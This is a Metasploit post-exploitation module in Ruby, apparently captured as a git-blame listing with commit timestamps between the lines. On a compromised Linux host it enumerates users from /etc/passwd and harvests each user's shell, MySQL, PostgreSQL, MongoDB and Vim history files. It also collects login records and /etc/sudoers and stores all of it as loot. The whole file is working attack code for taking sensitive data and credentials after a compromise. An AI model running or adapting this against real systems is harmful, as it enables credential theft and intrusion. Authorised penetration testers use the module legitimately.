2012-03-14 16:44:03 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-03-14 16:44:03 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2012-03-14 16:44:03 +00:00
|
|
|
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Linux::System
|
|
|
|
|
2014-12-29 20:58:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2015-01-06 07:42:52 +00:00
|
|
|
'Name' => 'Linux Gather User History',
|
|
|
|
'Description' => %q{
|
|
|
|
This module gathers the following user-specific information:
|
|
|
|
shell history, MySQL history, PostgreSQL history, MongoDB history,
|
|
|
|
Vim history, lastlog, and sudoers.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
# based largely on get_bash_history function by Stephen Haywood
|
|
|
|
'ohdae <bindshell[at]live.com>'
|
|
|
|
],
|
|
|
|
'Platform' => ['linux'],
|
|
|
|
'SessionTypes' => ['shell', 'meterpreter']
|
|
|
|
))
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
distro = get_sysinfo
|
|
|
|
|
2014-12-29 20:58:54 +00:00
|
|
|
print_good('Info:')
|
2013-09-05 18:41:25 +00:00
|
|
|
print_good("\t#{distro[:version]}")
|
|
|
|
print_good("\t#{distro[:kernel]}")
|
|
|
|
|
2014-12-29 20:58:54 +00:00
|
|
|
user = execute('/usr/bin/whoami')
|
2014-12-30 21:12:16 +00:00
|
|
|
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
|
|
|
|
users = [user] if user != 'root' || users.blank?
|
2013-09-05 18:41:25 +00:00
|
|
|
|
2014-12-30 21:12:16 +00:00
|
|
|
vprint_status("Retrieving history for #{users.length} users")
|
2015-01-06 07:42:52 +00:00
|
|
|
shells = %w{ash bash csh ksh sh tcsh zsh}
|
2014-12-30 21:12:16 +00:00
|
|
|
users.each do |u|
|
2014-12-30 22:12:35 +00:00
|
|
|
home = get_home_dir(u)
|
2014-12-30 21:12:16 +00:00
|
|
|
shells.each do |shell|
|
2014-12-30 22:12:35 +00:00
|
|
|
get_shell_history(u, home, shell)
|
2014-12-30 21:12:16 +00:00
|
|
|
end
|
2014-12-30 22:12:35 +00:00
|
|
|
get_mysql_history(u, home)
|
|
|
|
get_psql_history(u, home)
|
|
|
|
get_mongodb_history(u, home)
|
|
|
|
get_vim_history(u, home)
|
2014-12-29 20:26:12 +00:00
|
|
|
end
|
2014-12-30 21:12:16 +00:00
|
|
|
|
2014-12-29 20:58:54 +00:00
|
|
|
last = execute('/usr/bin/last && /usr/bin/lastlog')
|
|
|
|
sudoers = cat_file('/etc/sudoers')
|
|
|
|
save('Last logs', last) unless last.blank?
|
|
|
|
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
2014-12-29 20:58:54 +00:00
|
|
|
def save(msg, data, ctype = 'text/plain')
|
|
|
|
ltype = 'linux.enum.users'
|
2013-09-05 18:41:25 +00:00
|
|
|
loot = store_loot(ltype, ctype, session, data, nil, msg)
|
|
|
|
print_status("#{msg} stored in #{loot.to_s}")
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute(cmd)
|
|
|
|
vprint_status("Execute: #{cmd}")
|
|
|
|
output = cmd_exec(cmd)
|
2014-12-29 20:58:54 +00:00
|
|
|
output
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def cat_file(filename)
|
|
|
|
vprint_status("Download: #{filename}")
|
|
|
|
output = read_file(filename)
|
2014-12-29 20:58:54 +00:00
|
|
|
output
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
2014-12-30 22:12:35 +00:00
|
|
|
def get_home_dir(user)
|
|
|
|
home = execute("echo ~#{user}")
|
|
|
|
if home.empty?
|
|
|
|
if user == 'root'
|
2015-01-06 07:42:52 +00:00
|
|
|
home = '/root'
|
2014-12-30 22:12:35 +00:00
|
|
|
else
|
2015-01-06 07:42:52 +00:00
|
|
|
home = "/home/#{user}"
|
2014-12-30 22:12:35 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
home
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_shell_history(user, home, shell)
|
2014-12-30 21:12:16 +00:00
|
|
|
vprint_status("Extracting #{shell} history for #{user}")
|
2014-12-30 22:12:35 +00:00
|
|
|
hist = cat_file("#{home}/.#{shell}_history")
|
2015-01-06 07:42:52 +00:00
|
|
|
save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
2014-12-30 22:12:35 +00:00
|
|
|
def get_mysql_history(user, home)
|
2014-12-30 21:12:16 +00:00
|
|
|
vprint_status("Extracting MySQL history for #{user}")
|
2014-12-30 22:12:35 +00:00
|
|
|
sql_hist = cat_file("#{home}/.mysql_history")
|
2015-01-06 07:42:52 +00:00
|
|
|
save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
|
2014-12-29 20:33:22 +00:00
|
|
|
end
|
|
|
|
|
2014-12-30 22:12:35 +00:00
|
|
|
def get_psql_history(user, home)
|
2014-12-30 21:12:16 +00:00
|
|
|
vprint_status("Extracting PostgreSQL history for #{user}")
|
2014-12-30 22:12:35 +00:00
|
|
|
sql_hist = cat_file("#{home}/.psql_history")
|
2015-01-06 07:42:52 +00:00
|
|
|
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
2014-12-30 22:12:35 +00:00
|
|
|
def get_mongodb_history(user, home)
|
2014-12-30 21:38:58 +00:00
|
|
|
vprint_status("Extracting MongoDB history for #{user}")
|
2014-12-30 22:12:35 +00:00
|
|
|
sql_hist = cat_file("#{home}/.dbshell")
|
2015-01-06 07:42:52 +00:00
|
|
|
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
|
2014-12-30 21:38:58 +00:00
|
|
|
end
|
|
|
|
|
2014-12-30 22:12:35 +00:00
|
|
|
def get_vim_history(user, home)
|
2015-01-06 07:42:52 +00:00
|
|
|
vprint_status("Extracting Vim history for #{user}")
|
2014-12-30 22:12:35 +00:00
|
|
|
vim_hist = cat_file("#{home}/.viminfo")
|
2015-01-06 07:42:52 +00:00
|
|
|
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
2014-12-30 22:12:35 +00:00
|
|
|
|
2015-01-06 07:42:52 +00:00
|
|
|
end
|